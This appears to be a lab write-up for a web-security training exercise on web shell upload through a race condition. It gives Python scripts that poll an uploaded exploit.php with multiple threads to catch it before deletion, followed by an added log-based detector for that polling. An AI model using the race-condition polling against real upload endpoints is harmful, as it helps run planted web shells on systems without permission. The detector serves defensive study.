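This post documents a Python script written for the lab "Web shell upload via race condition".
As stated above, this post is meant to serve as documentation for the Python script. The lab does come with a solution, but that solution uses the Burp Suite Turbo Intruder extension. After searching for tutorials, I found that every write-up uses the approach suggested in the solution. I think writing my own Python script solves it more simply and is also good practice for my Python skills, so I want to offer a different approach here.
By the way, what the solution provides is in fact also a Python script.
The Python script only needs to keep sending GET requests to the host and then pick out the responses with status code 200.
This uses the Python Requests library: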
```shell
python -m pip install requests
```
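First upload a normal file to see the directory: files/avatars/Lenna_(test_image).png
The first version of the code I finished produced no result; I think maybe the Python requests were not that fast (?)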
```python
import requests


def request():
    # Path under the avatar directory where the uploaded file would be served
    dir = "/files/avatars/exploit.php"
    url = "https://xxxx.web-security-academy.net"
    while True:
        response = requests.get(url + dir)
        # Print the body only when the request returned 200
        if response.status_code == requests.codes.ok:
            print(response.text)


if __name__ == "__main__":
    request()
```
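Looking at other people's code, I wondered whether I could start a few threads. Brute force works wonders, so I started seven threads.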
```python
import requests
import threading


def request():
    # Path under the avatar directory where the uploaded file would be served
    dir = "/files/avatars/exploit.php"
    url = "https://xxxxx.web-security-academy.net"
    while True:
        response = requests.get(url + dir)
        # Print the body only when the request returned 200
        if response.status_code == requests.codes.ok:
            print(response.text)


if __name__ == "__main__":
    # Start seven threads, each running the same polling loop
    for _ in range(7):
        threading.Thread(target=request).start()
```
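The polling loop above leaves a recognizable trace in the web server's access log: one client requesting the same script path under the upload directory again and again until a 200 comes back. The detector below is an added example, not part of the original post; the combined log format, the sample lines, the extension list and the threshold are assumptions.

```python
import re
from collections import defaultdict

UPLOAD_PREFIX = "/files/avatars/"         # upload directory shown in the post
SCRIPT_EXT = (".php", ".phtml", ".phar")  # assumption: extensions the server executes
MIN_MISSES = 3                            # assumption: alert threshold

# Constructed sample lines in combined log format (not taken from the post)
_FMT = '{ip} - - [01/Jan/2024:10:00:{s:02d} +0000] "GET {p} HTTP/1.1" {c} 153'
SAMPLE_LOG = "\n".join(
    [_FMT.format(ip="203.0.113.7", s=i, p="/files/avatars/exploit.php", c=404)
     for i in range(4)]
    + [
        _FMT.format(ip="198.51.100.4", s=4, p="/files/avatars/Lenna_(test_image).png", c=200),
        _FMT.format(ip="198.51.100.9", s=5, p="/files/avatars/exploit.php", c=404),
        _FMT.format(ip="203.0.113.7", s=6, p="/files/avatars/exploit.php", c=200),
    ]
)

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def find_upload_polling(log_text, min_misses=MIN_MISSES):
    """Return (client, path, misses) for each client that requested a script
    under the upload directory at least min_misses times without a 200 and
    then received a 200 for that same path."""
    misses = defaultdict(int)
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, method, target, status = m.group(1), m.group(2), m.group(3), int(m.group(4))
        path = target.split("?", 1)[0]
        if method != "GET" or not path.startswith(UPLOAD_PREFIX):
            continue
        if not path.lower().endswith(SCRIPT_EXT):
            continue  # ordinary images in the avatar directory are ignored
        key = (client, path)
        if status != 200:
            misses[key] += 1
        else:
            if misses[key] >= min_misses:
                alerts.append((client, path, misses[key]))
            misses[key] = 0
    return alerts


if __name__ == "__main__":
    for client, path, count in find_upload_polling(SAMPLE_LOG):
        print(f"{client} polled {path}: {count} misses, then 200")
```

A 200 for an executable extension inside an upload directory is worth alerting on by itself; the miss counter adds the signal that the client was waiting for the file to appear.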